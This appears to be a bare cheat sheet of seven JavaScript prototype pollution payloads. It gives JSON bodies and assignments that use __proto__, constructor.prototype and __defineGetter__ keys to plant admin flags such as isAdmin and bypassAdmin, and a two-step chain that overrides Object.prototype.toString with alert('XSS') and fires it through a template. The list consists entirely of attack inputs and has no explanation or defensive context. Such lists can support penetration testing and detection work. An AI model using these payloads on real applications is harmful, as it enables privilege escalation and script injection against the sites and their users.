1. Object.prototype.isAdmin = true;


2. {"__proto__": {"polluted": "fromMerge"}}


3. __proto__.isDomAdmin=true


4. {
  "config": {
    "__proto__": {
      "reviverAdmin": true
    }
  }
}


5. {
  "constructor": {
    "prototype": {
      "lodashAdmin": true
    }
  }
}


6. // First inject a function into the prototype that will be executed
Object.prototype.toString = function() {
  return alert('XSS');
}

Step 2:
{{toString}}



7. {
  "constructor": {
    "prototype": {
      "bypassAdmin": true
    }
  }
}

or 

{
  "__defineGetter__": {
    "prototype": {
      "bypassAdmin": true
    }
  }
}